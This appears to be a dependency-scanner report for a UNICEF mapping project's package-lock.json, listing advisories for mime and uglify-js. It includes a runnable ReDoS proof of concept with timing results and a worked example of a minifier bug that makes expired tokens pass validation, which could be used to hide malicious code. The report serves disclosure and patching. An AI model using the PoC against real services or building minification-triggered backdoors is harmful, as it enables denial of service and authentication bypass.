unicef/magicbox-maps

package-lock.json


mime Regular Expression Denial of Service
Open

    "mime": {
      "version": "1.3.4",
      "resolved": "https://registry.npmjs.org/mime/-/mime-1.3.4.tgz",
      "integrity": "sha1-EV+eO2s9rylZmDyzjxSaLUDrXVM="
    },
Severity: Minor
Found in package-lock.json by nodesecurity

Regular Expression Denial of Service

Overview:

The mime module is vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Recommendation:

Upgrade to version 2.0.3 or greater.

uglify-js Regular Expression Denial of Service
Open

        "uglify-js": {
          "version": "2.2.5",
          "resolved": "https://registry.npmjs.org/uglify-js/-/uglify-js-2.2.5.tgz",
          "integrity": "sha1-puAqcNg5eSuXgEiLe4sYTAlcmcc=",
          "requires": {
Severity: Minor
Found in package-lock.json by nodesecurity

Regular Expression Denial of Service

Overview:

uglify-js is vulnerable to regular expression denial of service (ReDoS) when certain types of input are passed into .parse().

"The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time." [1]

Proof of Concept

var u = require('uglify-js');

// Build a string consisting of `len` copies of `chr`.
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i < len; i++) {
        result = result + chr;
    }

    return result;
};

// Feed the parser a numeric literal whose length is taken from the command line;
// parse time grows with the length of the literal.
u.parse("var a = " + genstr(parseInt(process.argv[2], 10), "1") + ".1ee7;");

Results

$ time node test.js 10000
real    0m1.091s
user    0m1.047s
sys 0m0.039s

$ time node test.js 80000
real    0m6.486s
user    0m6.229s
sys 0m0.094s

Recommendation:

Upgrade to version 2.6.0 or later.

uglify-js Incorrect Handling of Non-Boolean Comparisons During Minification
Open

        "uglify-js": {
          "version": "2.2.5",
          "resolved": "https://registry.npmjs.org/uglify-js/-/uglify-js-2.2.5.tgz",
          "integrity": "sha1-puAqcNg5eSuXgEiLe4sYTAlcmcc=",
          "requires": {
Severity: Minor
Found in package-lock.json by nodesecurity

Incorrect Handling of Non-Boolean Comparisons During Minification

Overview:

Tom MacWright discovered that UglifyJS versions 2.4.23 and earlier are affected by a vulnerability which allows a specially crafted JavaScript file to have altered functionality after minification. This bug was demonstrated by Yan to allow potentially malicious code to be hidden within secure-looking code, activated by minification.

Details:

In Boolean algebra, De Morgan's laws describe the relationships between conjunctions ( && ), disjunctions ( || ) and negations ( ! ). In JavaScript form, they state that:

!(a && b) === (!a || !b)
!(a || b) === (!a && !b)

These identities only hold for the truthiness of the result, however. JavaScript's && and || return one of their operands rather than a boolean, so when one of the values is not a boolean the rewritten expression no longer yields the same value: a && b may evaluate to a number such as -500, whereas !(!a || !b) is always true or false.

Vulnerable versions of UglifyJS do not account for this restriction, and erroneously apply the laws to a statement whenever doing so shortens it.

Consider this authentication function:

function isTokenValid(user) {
    var timeLeft =
        !!config && // config object exists
        !!user.token && // user object has a token
        !user.token.invalidated && // token is not explicitly invalidated
        !config.uninitialized && // config is initialized
        !config.ignoreTimestamps && // don't ignore timestamps
        getTimeLeft(user.token.expiry); // > 0 if expiration is in the future

    // The token must not be expired
    return timeLeft > 0;
}

function getTimeLeft(expiry) {
  return expiry - getSystemTime();
}

When minified with a vulnerable version of UglifyJS, it will produce the following insecure output, in which timeLeft is always a boolean, so an expired token (negative time left) yields true, and true > 0 is true: a token never expires.

( Formatted for readability )

function isTokenValid(user) {
    var timeLeft = !(                       // negation
        !config                             // config object does not exist
        || !user.token                      // user object does not have a token
        || user.token.invalidated           // token is explicitly invalidated
        || config.uninitialized             // config isn't initialized
        || config.ignoreTimestamps          // ignore timestamps
        || !getTimeLeft(user.token.expiry)  // true only when time left is exactly 0; a negative (expired) value is truthy, so this is false
    );
    return timeLeft > 0
}

function getTimeLeft(expiry) {
    return expiry - getSystemTime()
}
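To make the failure concrete, the following is an added example (not code from the page, from UglifyJS or from the magicbox-maps project) that runs the advisory's isTokenValid function and its De Morgan-rewritten form side by side against a constructed clock and config. The config and getSystemTime in the advisory are globals; here they are passed as parameters so the example runs stand-alone, and the deMorganCheck helper shows the underlying value mismatch on plain operands.

```javascript
// De Morgan's laws preserve truthiness, but && and || return an operand,
// not a boolean. Negating the rewritten form collapses a value to true/false.
function deMorganCheck(a, b) {
  return {
    original: a && b,                 // value of the last operand evaluated
    rewritten: !(!a || !b),           // always a boolean
    sameTruthiness: !!(a && b) === !(!a || !b),
  };
}

function getTimeLeft(expiry, getSystemTime) {
  return expiry - getSystemTime();    // > 0 if expiration is in the future
}

// The function as written in the advisory (config and clock passed in
// instead of read from globals; this is an adaptation, not the original).
function isTokenValidOriginal(config, user, getSystemTime) {
  var timeLeft =
    !!config &&
    !!user.token &&
    !user.token.invalidated &&
    !config.uninitialized &&
    !config.ignoreTimestamps &&
    getTimeLeft(user.token.expiry, getSystemTime); // a number when all checks pass
  return timeLeft > 0;
}

// The shape a vulnerable UglifyJS (<= 2.4.23) emits after applying De Morgan.
function isTokenValidMinified(config, user, getSystemTime) {
  var timeLeft = !(
    !config ||
    !user.token ||
    user.token.invalidated ||
    config.uninitialized ||
    config.ignoreTimestamps ||
    !getTimeLeft(user.token.expiry, getSystemTime) // only true when time left is 0
  );
  return timeLeft > 0;                             // timeLeft is now a boolean
}

// Constructed fixture: clock fixed at t = 1000, config initialised and
// honouring timestamps. Assumed values, not from any real deployment.
const NOW = 1000;
const clock = () => NOW;
const config = { uninitialized: false, ignoreTimestamps: false };

// Evaluate both variants for a token with the given expiry.
function compare(expiry, invalidated = false) {
  const user = { token: { expiry, invalidated } };
  return {
    original: isTokenValidOriginal(config, user, clock),
    minified: isTokenValidMinified(config, user, clock),
  };
}

// Expired 500 ticks ago: original rejects, minified accepts.
console.log("expired ", compare(NOW - 500));
// Valid for 500 more ticks: both accept.
console.log("valid   ", compare(NOW + 500));
// Explicitly invalidated: both reject (the boolean checks still agree).
console.log("revoked ", compare(NOW + 500, true));
// Plain operands: same truthiness, different value.
console.log("demorgan", deMorganCheck(5, -500));
```

The only case where the two variants disagree is the one that matters: when every guard passes and getTimeLeft returns a negative number, the original returns false while the minified form returns true. Runtime tests that only exercise unexpired tokens will not catch this, which is why the fix is to upgrade the minifier rather than to trust the minified output.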

Recommendation:

Upgrade UglifyJS to version >= 2.4.24.

